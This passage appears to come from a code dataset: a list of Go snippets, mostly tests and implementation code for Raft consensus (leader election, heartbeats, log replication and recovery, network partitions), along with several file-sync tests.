{\n\t\tpseudoClusters[oldLeader].AddToInboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[oldLeader].AddToOutboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[follower].AddToInboxFilter(raftServers[i].Pid())\n\t\tpseudoClusters[follower].AddToOutboxFilter(raftServers[i].Pid())\n\t}\n\n\tpseudoClusters[oldLeader].AddToOutboxFilter(cluster.BROADCAST)\n\tpseudoClusters[follower].AddToOutboxFilter(cluster.BROADCAST)\n\n\t// wait for other servers to discover that leader\n\t// has crashed and to elect a new leader\n\ttime.Sleep(20 * time.Second)\n\n\tcount = 0\n\tfor i := 1; i <= serverCount; i += 1 {\n\n\t\tif i != oldLeader && i != follower && raftServers[i].Leader() == raftServers[i].Pid() {\n\t\t\tfmt.Println(\"Server \" + strconv.Itoa(i) + \" was chosen as new leader in majority partition.\")\n\t\t\tcount++\n\t\t}\n\t}\n\t// new leader must be chosen\n\tif count != 1 {\n\t\tt.Errorf(\"No leader was chosen in majority partition\")\n\t}\n}", "func TestHandleHeartbeat(t *testing.T) {\n\tcommit := uint64(2)\n\ttests := []struct {\n\t\tm pb.Message\n\t\twCommit uint64\n\t}{\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit + 1}, commit + 1},\n\t\t{pb.Message{From: 2, To: 1, Type: pb.MsgHeartbeat, Term: 2, Commit: commit - 1}, commit}, // do not decrease commit\n\t}\n\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tdefer storage.Close()\n\t\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 2}, {Index: 3, Term: 3}})\n\t\tsm := newTestRaft(1, []uint64{1, 2}, 5, 1, storage)\n\t\tsm.becomeFollower(2, 2)\n\t\tsm.raftLog.commitTo(commit)\n\t\tsm.handleHeartbeat(tt.m)\n\t\tif sm.raftLog.committed != tt.wCommit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, sm.raftLog.committed, tt.wCommit)\n\t\t}\n\t\tm := sm.readMessages()\n\t\tif len(m) != 1 {\n\t\t\tt.Fatalf(\"#%d: msg = nil, want 1\", i)\n\t\t}\n\t\tif m[0].Type != pb.MsgHeartbeatResp {\n\t\t\tt.Errorf(\"#%d: type = %v, want MsgHeartbeatResp\", i, m[0].Type)\n\t\t}\n\t}\n}", "func TestRaft1(t *testing.T) {\n\n\t//Remove any state recovery files\n\tfor i := 0; i < 5; i++ {\n\t\tos.Remove(fmt.Sprintf(\"%s_S%d.state\", raft.FILENAME, i))\n\t}\n\n\tgo main() //Starts all servers\n\n\tvar leaderId1, leaderId2 int\n\tack := make(chan bool)\n\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId1 = raft.KillLeader() //Kill leader\n\t\tlog.Print(\"Killed leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(2*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId2 = raft.KillLeader() //Kill current leader again\n\t\tlog.Print(\"Killed leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(3*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServer(leaderId2) //Resurrect last killed as follower\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(4*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServerAsLeader(leaderId1) //Ressurect first one as leader\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(5*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tack <- true\n\t})\n\n\t<-ack\n}", "func TestRaftRemoveOneNode(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftRemoveOneNode\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\tconnectAllNodes(n1, n2)\n\n\t// Start the cluster with the node n1 and n2.\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tvar follower *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\t\tfollower = n2\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t\tfollower = n1\n\t}\n\n\t// Propose two commands to the cluster.\n\tleader.Propose([]byte(\"data1\"))\n\tpending := leader.Propose([]byte(\"data2\"))\n\t<-pending.Done\n\t// They should be applied in the same order.\n\tif !testEntriesEqual(fsm1.appliedCh, fsm2.appliedCh, 2) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n\n\t// Remove the follower from the cluster.\n\tpending = leader.RemoveNode(follower.config.ID)\n\t<-pending.Done\n\tif pending.Err != nil {\n\t\tt.Fatalf(\"fail to remove follower from the cluster: %v\", pending.Err)\n\t}\n}", "func TestSyncBasedOnCheckSum(t *testing.T) {\n\tctx := context.Background()\n\tctx, ci := fs.AddConfig(ctx)\n\tr := fstest.NewRun(t)\n\tci.CheckSum = true\n\n\tfile1 := r.WriteFile(\"check sum\", \"-\", t1)\n\tr.CheckLocalItems(t, file1)\n\n\taccounting.GlobalStats().ResetCounters()\n\terr := Sync(ctx, r.Fremote, r.Flocal, false)\n\trequire.NoError(t, err)\n\n\t// We should have transferred exactly one file.\n\tassert.Equal(t, toyFileTransfers(r), accounting.GlobalStats().GetTransfers())\n\tr.CheckRemoteItems(t, file1)\n\n\t// Change last modified date only\n\tfile2 := r.WriteFile(\"check sum\", \"-\", t2)\n\tr.CheckLocalItems(t, file2)\n\n\taccounting.GlobalStats().ResetCounters()\n\terr = Sync(ctx, r.Fremote, r.Flocal, false)\n\trequire.NoError(t, err)\n\n\t// We should have transferred no files\n\tassert.Equal(t, int64(0), accounting.GlobalStats().GetTransfers())\n\tr.CheckLocalItems(t, file2)\n\tr.CheckRemoteItems(t, file1)\n}", "func (r *Raft) leaderProcessLog(s *leaderState, l *Log) bool {\n\t// Only handle LogAddPeer and LogRemove Peer\n\tif l.Type != LogAddPeer && l.Type != LogRemovePeer {\n\t\treturn false\n\t}\n\n\t// Process the log immediately to update the peer list\n\tr.processLog(l)\n\n\t// Decode the peer\n\tpeer := r.trans.DecodePeer(l.Data)\n\tisSelf := peer.String() == r.localAddr.String()\n\n\t// Get the replication state\n\trepl, ok := s.replicationState[peer.String()]\n\n\t// Start replication for new nodes\n\tif l.Type == LogAddPeer && !ok && !isSelf {\n\t\tr.startReplication(s, peer)\n\t}\n\n\t// Stop replication for old nodes\n\tif l.Type == LogRemovePeer && ok {\n\t\tclose(repl.stopCh)\n\t\tdelete(s.replicationState, peer.String())\n\t}\n\n\t// Step down if we are being removed\n\tif l.Type == LogRemovePeer && isSelf {\n\t\tr.logD.Printf(\"Removed ourself, stepping down as leader\")\n\t\treturn true\n\t}\n\treturn false\n}", "func TestSyncWithTrackRenames(t *testing.T) {\n\tctx := context.Background()\n\tctx, ci := fs.AddConfig(ctx)\n\tr := fstest.NewRun(t)\n\n\tci.TrackRenames = true\n\tdefer func() {\n\t\tci.TrackRenames = false\n\t}()\n\n\thaveHash := r.Fremote.Hashes().Overlap(r.Flocal.Hashes()).GetOne() != hash.None\n\tcanTrackRenames := haveHash && operations.CanServerSideMove(r.Fremote)\n\tt.Logf(\"Can track renames: %v\", canTrackRenames)\n\n\tf1 := r.WriteFile(\"potato\", \"Potato Content\", t1)\n\tf2 := r.WriteFile(\"yam\", \"Yam Content\", t2)\n\n\taccounting.GlobalStats().ResetCounters()\n\trequire.NoError(t, Sync(ctx, r.Fremote, r.Flocal, false))\n\n\tr.CheckRemoteItems(t, f1, f2)\n\tr.CheckLocalItems(t, f1, f2)\n\n\t// Now rename locally.\n\tf2 = r.RenameFile(f2, \"yaml\")\n\n\taccounting.GlobalStats().ResetCounters()\n\trequire.NoError(t, Sync(ctx, r.Fremote, r.Flocal, false))\n\n\tr.CheckRemoteItems(t, f1, f2)\n\n\t// Check we renamed something if we should have\n\tif canTrackRenames {\n\t\trenames := accounting.GlobalStats().Renames(0)\n\t\tassert.Equal(t, canTrackRenames, renames != 0, fmt.Sprintf(\"canTrackRenames=%v, renames=%d\", canTrackRenames, renames))\n\t}\n}", "func TestLogger(t *testing.T) log.Logger {\n\tt.Helper()\n\n\tl := log.NewSyncLogger(log.NewLogfmtLogger(os.Stderr))\n\tl = log.WithPrefix(l,\n\t\t\"test\", t.Name(),\n\t\t\"ts\", log.Valuer(testTimestamp),\n\t)\n\n\treturn l\n}", "func TestRaftLeaderLeaseLost(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftLeaderLeaseLost\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn1 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tcfg = getTestConfig(ID2, clusterPrefix+ID2)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn2 := testCreateRaftNode(cfg, newStorage())\n\n\tconnectAllNodes(n1, n2)\n\tn1.transport = NewMsgDropper(n1.transport, 193, 0)\n\tn2.transport = NewMsgDropper(n2.transport, 42, 0)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t}\n\n\t// Create a network partition between \"1\" and \"2\", so leader will lost its leader lease eventually.\n\tn1.transport.(*msgDropper).Set(ID2, 1)\n\tn2.transport.(*msgDropper).Set(ID1, 1)\n\n\t// The leader will lose its leadership eventually because it can't talk to\n\t// the other node.\n\t<-leader.fsm.(*testFSM).followerCh\n}", "func testSyncAfterRemovingAFileAndAddingAFileSubDir(ctx context.Context, t *testing.T) {\n\tr := fstest.NewRun(t)\n\tfile1 := r.WriteFile(\"a/potato2\", \"------------------------------------------------------------\", t1)\n\tfile2 := r.WriteObject(ctx, \"b/potato\", \"SMALLER BUT SAME DATE\", t2)\n\tfile3 := r.WriteBoth(ctx, \"c/non empty space\", \"AhHa!\", t2)\n\trequire.NoError(t, operations.Mkdir(ctx, r.Fremote, \"d\"))\n\trequire.NoError(t, operations.Mkdir(ctx, r.Fremote, \"d/e\"))\n\n\tr.CheckLocalListing(\n\t\tt,\n\t\t[]fstest.Item{\n\t\t\tfile1,\n\t\t\tfile3,\n\t\t},\n\t\t[]string{\n\t\t\t\"a\",\n\t\t\t\"c\",\n\t\t},\n\t)\n\tr.CheckRemoteListing(\n\t\tt,\n\t\t[]fstest.Item{\n\t\t\tfile2,\n\t\t\tfile3,\n\t\t},\n\t\t[]string{\n\t\t\t\"b\",\n\t\t\t\"c\",\n\t\t\t\"d\",\n\t\t\t\"d/e\",\n\t\t},\n\t)\n\n\taccounting.GlobalStats().ResetCounters()\n\terr := Sync(ctx, r.Fremote, r.Flocal, false)\n\trequire.NoError(t, err)\n\n\tr.CheckLocalListing(\n\t\tt,\n\t\t[]fstest.Item{\n\t\t\tfile1,\n\t\t\tfile3,\n\t\t},\n\t\t[]string{\n\t\t\t\"a\",\n\t\t\t\"c\",\n\t\t},\n\t)\n\tr.CheckRemoteListing(\n\t\tt,\n\t\t[]fstest.Item{\n\t\t\tfile1,\n\t\t\tfile3,\n\t\t},\n\t\t[]string{\n\t\t\t\"a\",\n\t\t\t\"c\",\n\t\t},\n\t)\n}", "func TestBasic(t *testing.T){\r\n\tif !TESTBASIC{\r\n\t\treturn\r\n\t}\r\n rafts,_ := makeRafts(5, \"input_spec.json\", \"log\", 220, 300)\t\r\n\tcontents := make([]string, 2)\r\n\tcontents[0] = \"foo\"\r\n\tcontents[1] = \"bar\"\r\n\t//To get one node elected as Leader\r\n\ttime.Sleep(2*time.Second)\r\n\trafts[0].Append([]byte(contents[0]))\r\n\trafts[0].Append([]byte(contents[1]))\r\n\tciarr := []int{0,0,0,0,0}\r\n\tfor cnt:=0;cnt<5;{\r\n\t\tfor idx, node := range rafts {\r\n\t\t\tselect {\r\n\t\t\tcase ci := <-node.CommitChannel():\r\n\t\t\t\tif ci.Err != nil {\r\n\t\t\t\t\tfmt.Fprintln(os.Stderr,ci.Err)\r\n\t\t\t\t}\r\n\t\t\t\texpect(t,contents[ciarr[idx]], string(ci.Data))\r\n\t\t\t\tciarr[idx] += 1\r\n\t\t\t\tif ciarr[idx] == 2{\r\n\t\t\t\t\tcnt += 1\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tfor _, node := range rafts{\r\n\t\t//Tests LogStore actions\r\n\t\tnode.mainLogLock.RLock()\r\n\t\tdefer node.mainLogLock.RUnlock()\r\n\t\tiface, err := node.mainLog.Get(0)\r\n\t\tcheckError(t, err,fmt.Sprintf(\"NodeId:%v, mainLog.get(0) mainLog.LastIndex:%v\", node.Id(), node.mainLog.GetLastIndex()))\r\n\t\tif iface != nil{\r\n\t\t\tfoo := iface.([]byte)\r\n\t\t\texpect(t, string(foo), \"foo\")\r\n\t\t\tdebugRaftTest(fmt.Sprintf(\"0:%v\", string(foo)))\r\n\t\t}\r\n\t\tiface, err = node.mainLog.Get(1) \r\n\t\tcheckError(t, err, fmt.Sprintf(\"NodeId:%v, mainLog.get(1) mainLog.LastIndex:%v\", node.Id(), node.mainLog.GetLastIndex()))\r\n\t\tif iface != nil{\r\n\t\t\tbar := iface.([]byte)\r\n\t\t\texpect(t, string(bar), \"bar\")\r\n\t\t\tdebugRaftTest(fmt.Sprintf(\"1:%v\", string(bar)))\r\n\t\t}\r\n\r\n\t\t//Tests StateStore actions\r\n\t\tnode.stateLogLock.RLock()\r\n\t\tdefer node.stateLogLock.RUnlock()\r\n\t\tnode.smLock.RLock()\r\n\t\tdefer node.smLock.RUnlock()\r\n\t\tiface, err = node.stateLog.Get(0) \r\n\t\tcheckError(t, err, fmt.Sprintf(\"Id:%v, stateLog.get(0)\", node.Id()))\r\n\t\tif iface != nil{\r\n\t\t\tstate := iface.(StateInfo)\r\n\t\t\texpect(t, fmt.Sprintf(\"%v\", state.CurrTerm), fmt.Sprintf(\"%v\", node.sm.currTerm))\r\n\t\t\texpect(t, fmt.Sprintf(\"%v\", state.VotedFor), fmt.Sprintf(\"%v\", node.sm.votedFor))\r\n\t\t\texpect(t, state.Log.String(), node.sm.log.String())\r\n\t\t}\r\n\t}\r\n\r\n\tfor _, node := range rafts {\r\n\t\tnode.Shutdown()\r\n\t}\r\n\ttime.Sleep(1*time.Second)\t\t\t\r\n}", "func TestLogRecovery(t *testing.T) {\n\tpath := setupLog(\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`6ac5807c 0000000000000003 00000000000`)\n\tlog := NewLog()\n\tlog.AddCommandType(&TestCommand1{})\n\tlog.AddCommandType(&TestCommand2{})\n\tif err := log.Open(path); err != nil {\n\t\tt.Fatalf(\"Unable to open log: %v\", err)\n\t}\n\tdefer log.Close()\n\tdefer os.Remove(path)\n\n\tif err := log.Append(NewLogEntry(log, 3, 2, &TestCommand1{\"bat\", -5})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\n\t// Validate existing log entries.\n\tif len(log.entries) != 3 {\n\t\tt.Fatalf(\"Expected 2 entries, got %d\", len(log.entries))\n\t}\n\tif !reflect.DeepEqual(log.entries[0], NewLogEntry(log, 1, 1, &TestCommand1{\"foo\", 20})) {\n\t\tt.Fatalf(\"Unexpected entry[0]: %v\", log.entries[0])\n\t}\n\tif !reflect.DeepEqual(log.entries[1], NewLogEntry(log, 2, 1, &TestCommand2{100})) {\n\t\tt.Fatalf(\"Unexpected entry[1]: %v\", log.entries[1])\n\t}\n\tif !reflect.DeepEqual(log.entries[2], NewLogEntry(log, 3, 2, &TestCommand1{\"bat\", -5})) {\n\t\tt.Fatalf(\"Unexpected entry[2]: %v\", log.entries[2])\n\t}\n\n\t// Validate precommit log contents.\n\texpected :=\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\"\n\tactual, _ := ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n\n\t// Validate committed log contents.\n\tif err := log.SetCommitIndex(3); err != nil {\n\t\tt.Fatalf(\"Unable to partially commit: %v\", err)\n\t}\n\texpected =\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`3f3f884c 0000000000000003 0000000000000002 cmd_1 {\"val\":\"bat\",\"i\":-5}`+\"\\n\"\n\tactual, _ = ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n}", "func SyncAllLog(log_conn Log_Conn ){\n\t//fmt.Println(\"Sync Called\")\n\tfor r.IsLeader==1{\n\t\tlogentry:=log_conn.Logentry\n\t\tconn:=log_conn.Conn\n\t\tbreakVariable:=false\n\t\tvar args *AppendRPCArgs\n\t\tvar heartBeat bool\n\t\tvar logentry1 LogEntry\n\t\t//var majority int\n\t\traft.AppendHeartbeat <- 1\n\t\tfor _,server := range r.ClusterConfigV.Servers {\n\t\t\tif server.Id != r.Id {\n\t\t\t\t// if Follower not having latast entry and Expected entry index is less or equal to current Log index \n\t\t\t\tif r.MatchIndex[server.Id] < (logentry.SequenceNumber) && r.NextIndex[server.Id] <= (logentry.SequenceNumber) { //&& r.MatchIndex[server.Id]!=0 && r.NextIndex[server.Id]!=0\n\t\t\t\t\tlogentry1=r.Log[r.NextIndex[server.Id]] // Next to send is entry at Next Index \n\t\t\t\t\t//majority = r.MatchIndex[server.Id] \n\t\t\t\t\tif logentry1.SequenceNumber >= 1 {\t\n\t\t\t\t\t\t\targs = &AppendRPCArgs {\n\t\t\t\t\t\t\tlogentry1.Term,\n\t\t\t\t\t\t\tr.LeaderId,\n\t\t\t\t\t\t\tlogentry1.SequenceNumber-1,\n\t\t\t\t\t\t\tr.Log[logentry1.SequenceNumber-1].Term,\n\t\t\t\t\t\t\tlogentry1,\n\t\t\t\t\t\t\tr.CommitIndex,\n\t\t\t\t\t\t\t}\n\t\t\t\t\t} else {\n\t\t\t\t\t\t\targs = &AppendRPCArgs {\n\t\t\t\t\t\t\tlogentry1.Term,\n\t\t\t\t\t\t\tr.LeaderId,\n\t\t\t\t\t\t\t0,\n\t\t\t\t\t\t\tlogentry1.Term,\n\t\t\t\t\t\t\tlogentry1,\n\t\t\t\t\t\t\tr.CommitIndex,\n\t\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t\theartBeat = false\n\t\t\t\t}else { // Else send normal heart beat to follower\n\t\t\t\t\targs = prepareHeartBeat()\n\t\t\t\t\theartBeat = true\n\t\t\t\t}// end of if else\n\t\t\t\t\tvar AppendAck_ch = make (chan int,1)\n\t\t\t\t\tif(heartBeat){ \n\t\t\t\t\t\tvar DummyChan = make (chan int,1)\n\t\t\t\t\t\tgo r.sendAppendRpc(server,args,DummyChan,false) // Dont wait on HeartBeat, heart Beat is Send\n\t\t\t\t\t}else{\n\t\t\t\t\t\t//fmt.Println(\"Sending SYnc for server \",server.Id,\" log \",logentry1.SequenceNumber)\n\t\t\t\t\t\tgo r.sendAppendRpc(server,args,AppendAck_ch,false) \n\t\t\t\t\t}\n\t\t\t\t\tif !heartBeat && -1 !=<-AppendAck_ch { // If Log Entry is send, wait for reply, If log entry is appended to follower\n\t\t\t\t\t\tmajorityCount:=0\n\t\t\t\t\t\tfor _,serverC:= range r.ClusterConfigV.Servers { // Check if log entry is in majority \n\t\t\t\t\t\t\tif serverC.Id !=r.Id && serverC.Id != server.Id && r.MatchIndex[serverC.Id] >= logentry1.SequenceNumber {//&& r.MatchIndex[serverC.Id] != 0 {\n\t\t\t\t\t\t\t\tmajorityCount++\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\t// If Log entry is in majority and is not committed yet, commit the log entry and send it to input_ch for evaluation\n\t\t\t\t\t\tif majorityCount < len(r.ClusterConfigV.Servers)/2 && majorityCount+1 >len(r.ClusterConfigV.Servers)/2{\n\t\t\t\t\t\t\tr.Log[logentry1.SequenceNumber].IsCommitted=true\t\n\t\t\t\t\t\t\tr.CommitIndex=logentry1.SequenceNumber\n\t\t\t\t\t\t\tr.File.WriteString(strconv.Itoa(logentry1.Term)+\" \"+strconv.Itoa(logentry1.SequenceNumber)+\" \"+strings.TrimSpace(strings.Replace(string(logentry1.Command),\"\\n\",\" \",-1))+\" \"+\" \"+strconv.FormatBool(logentry1.IsCommitted))\n\t\t\t\t\t\t\tr.File.WriteString(\"\\t\\r\\n\");\n\t\t\t\t\t\t\tInput_ch <- Log_Conn{logentry1,conn}\n\t\t\t\t\t\t\tbreakVariable=true\n\t\t\t\t\t\t}else if majorityCount+1 >len(r.ClusterConfigV.Servers)/2 && logentry.SequenceNumber==logentry1.SequenceNumber {\n\t\t\t\t\t\t\t// if Log was already in majority and now all log is in majority no need to send more log entries\n\t\t\t\t\t\t\tbreakVariable=true\n\t\t\t\t\t\t}\n\t\t\t\t\t}// end of IF\n\t\t\t\t} // outer if\t\n\t\t\t}//inner for loop\n\t\t\tif breakVariable{\n\t\t\t\t\tbreak\n\t\t\t}\n\t\t\tmajorityCount:=0\n\t\t\tfor _,server:= range r.ClusterConfigV.Servers {\n\t\t\t\t\t\t//if i.Id !=raft.ServerId && i!=value && raft.matchIndex[i.Id] >majorityCheck {\n\t\t\t\tif server.Id !=r.Id && r.MatchIndex[server.Id] >= logentry.SequenceNumber {\n\t\t\t\t\t\tmajorityCount++\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif majorityCount+1 >len(r.ClusterConfigV.Servers)/2 || r.IsLeader!=1{\n\t\t\t\t\tbreak\n\t\t\t\t}\t\t\n\t}//outer for loop\n\t//fmt.Println(\"Sync Exited\")\n}", "func TestAddNodeCheckQuorum(t *testing.T) {\n\tr := newTestRaft(1, []uint64{1}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tr.pendingConf = true\n\tr.checkQuorum = true\n\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\n\tfor i := 0; i < r.electionTimeout-1; i++ {\n\t\tr.tick()\n\t}\n\tgrp := pb.Group{\n\t\tNodeId: 2,\n\t\tGroupId: 1,\n\t\tRaftReplicaId: 2,\n\t}\n\tr.addNode(2, grp)\n\n\t// This tick will reach electionTimeout, which triggers a quorum check.\n\tr.tick()\n\n\t// Node 1 should still be the leader after a single tick.\n\tif r.state != StateLeader {\n\t\tt.Errorf(\"state = %v, want %v\", r.state, StateLeader)\n\t}\n\n\t// After another electionTimeout ticks without hearing from node 2,\n\t// node 1 should step down.\n\tfor i := 0; i < r.electionTimeout; i++ {\n\t\tr.tick()\n\t}\n\n\tif r.state != StateFollower {\n\t\tt.Errorf(\"state = %v, want %v\", r.state, StateFollower)\n\t}\n}", "func (rf *Raft) sendAppendEntriesToMultipleFollowers() {\n for !rf.killed() {\n rf.mu.Lock()\n if rf.state != \"Leader\" {\n DLCPrintf(\"Server (%d) is no longer Leader and stop sending Heart Beat\", rf.me)\n rf.mu.Unlock()\n return\n }\n\n for i := 0; i < len(rf.peers) && rf.state == \"Leader\"; i++ {\n if i == rf.me {\n continue\n }else{\n if rf.nextIndex[i] <= rf.snapshottedIndex {\n go rf.sendInstallSnapshotToOneFollower(i, rf.log[0].Term)\n }else{\n go rf.sendAppendEntriesToOneFollower(i)\n }\n }\n }\n if rf.state != \"Leader\" {\n DLCPrintf(\"Server (%d) is no longer Leader and stop sending Heart Beat\", rf.me)\n rf.mu.Unlock()\n return\n }\n rf.commitEntries()\n rf.mu.Unlock()\n\n time.Sleep(100 * time.Millisecond)\n }\n}", "func TestPartitionOfCluster(t *testing.T) {\n\n\n\trafts, cluster := makeMockRafts() // array of []raft.Node\n\n\tfor i:=0; i<5; i++ {\n\t\tdefer rafts[i].raft_log.Close()\n\t\tgo rafts[i].processEvents()\n\t}\n\n\ttime.Sleep(2*time.Second)\n\tvar ldr *RaftNode\n\tvar mutex sync.RWMutex\n\tfor {\n\t\tmutex.Lock()\n\t\tldr = getLeader(rafts)\n\t\tif (ldr != nil) {\n\t\t\tbreak\n\t\t}\n\t\tmutex.Unlock()\n\t}\n\n\tldr.Append([]byte(\"foo\"))\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\t//if ci.Err != nil {t.Fatal(ci.Err)}\n\t\t\tif string(ci.Data.Data) != \"foo\" {\n\t\t\t\tt.Fatal(\"Got different data\")\n\t\t\t}\n\t\tdefault:\n\t\t}\n\t}\n\n\n\tfor {\n\t\tldr = getLeader(rafts)\n\t\tif (ldr != nil) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif(ldr.Id() == 1 || ldr.Id() == 0) {\n\t\tcluster.Partition([]int{0, 1}, []int{2, 3, 4})\n\t} else if(ldr.Id() == 2) {\n\t\tcluster.Partition([]int{0, 1, 3}, []int{2, 4})\n\t} else {\n\t\tcluster.Partition([]int{0, 1, 2}, []int{3, 4})\n\t}\n\n\tldr.Append([]byte(\"foo2\"))\n\tvar ldr2 *RaftNode\n\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\tt.Fatal(\"Got different data \"+ string(ci.Data.Data))\n\t\tdefault:\n\t\t}\n\t}\n\n\tcluster.Heal()\n\n\ttime.Sleep(3*time.Second)\n\tfor {\n\t\tldr2 = getLeader(rafts)\n\n\t\tif (ldr2 != nil && ldr2.sm.serverID != ldr.sm.serverID) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// Leader will not have \"fooAgain\" entry, will force new entry to all nodes\n\tldr2.Append([]byte(\"foo3\"))\n\ttime.Sleep(2*time.Second)\n\n\tfor _, node := range rafts {\n\t\tselect {\n\t\tcase ci := <- node.CommitChannel():\n\t\t\tif string(ci.Data.Data) != \"foo3\" {\n\t\t\t\tt.Fatal(\"Got different data \"+ string(ci.Data.Data))\n\t\t\t}\n\t\t}\n\t}\n\n\tfor _, node := range rafts {\n\t\tnode.Shutdown()\n\t}\n\n}", "func (r *Raft) AppendToLog_Follower(request AppendEntriesReq) {\n\tTerm := request.LeaderLastLogTerm\n\tcmd := request.Entries\n\tindex := request.PrevLogIndex + 1\n\tlogVal := LogVal{Term, cmd, 0} //make object for log's value field\n\n\tif len(r.MyLog) == index {\n\t\tr.MyLog = append(r.MyLog, logVal) //when trying to add a new entry\n\t} else {\n\t\tr.MyLog[index] = logVal //overwriting in case of log repair\n\t}\n\n\tr.MyMetaData.LastLogIndex = index\n\tr.MyMetaData.PrevLogIndex = index - 1\n\tif index == 0 {\n\t\tr.MyMetaData.PrevLogTerm = r.MyMetaData.PrevLogTerm + 1 //or simple -1\n\t} else if index >= 1 {\n\t\tr.MyMetaData.PrevLogTerm = r.MyLog[index-1].Term\n\t}\n\tleaderCI := float64(request.LeaderCommitIndex) //Update commit index\n\tmyLI := float64(r.MyMetaData.LastLogIndex)\n\tif request.LeaderCommitIndex > r.MyMetaData.CommitIndex {\n\t\tr.MyMetaData.CommitIndex = int(math.Min(leaderCI, myLI))\n\t}\n\tr.WriteLogToDisk()\n}", "func TestLogWriteFail(t *testing.T) {\n\tcm := NewChatManager(&FailWriter{}, historySize)\n\tdc := dummyconn.NewDummyConn()\n\terr := cm.Join(\"testuser\", dc)\n\tif err != nil {\n\t\tt.Fatalf(\"Unexpected error: %s\", err)\n\t}\n\n\tbuf := make([]byte, bufSize)\n\tn, err := dc.Read(buf)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\trMsg := buf[:n]\n\texpected := []byte(testTime + \" * testuser has joined\\n\")\n\tif !bytes.Equal(rMsg, expected) {\n\t\tt.Fatalf(\"Unexpected read: %s, want %s.\", rMsg, expected)\n\t}\n}", "func (sm *State_Machine) LeadTesting(t *testing.T) {\n\tvar follTC TestCases\n\tfollTC.t = t\n\tvar cmdReq = []string{\"rename test\"}\n\n\t//<<<|Id:1000|Status:leader|CurrTerm:6|LoggInd:4|votedFor:0|commitInd:0|>>>\n\n\t/*Sending timeout*/\n\t//-->Expected to send heartbeat msg to all server.\n\tfollTC.req = Timeout{}\n\tfollTC.respExp = Send{PeerId: 0, Event: AppEntrReq{Term: 6, LeaderId: 1000, PreLoggInd: 3, PreLoggTerm: 2, LeaderCom: 2}}\n\tsm.TimeoutCh <- 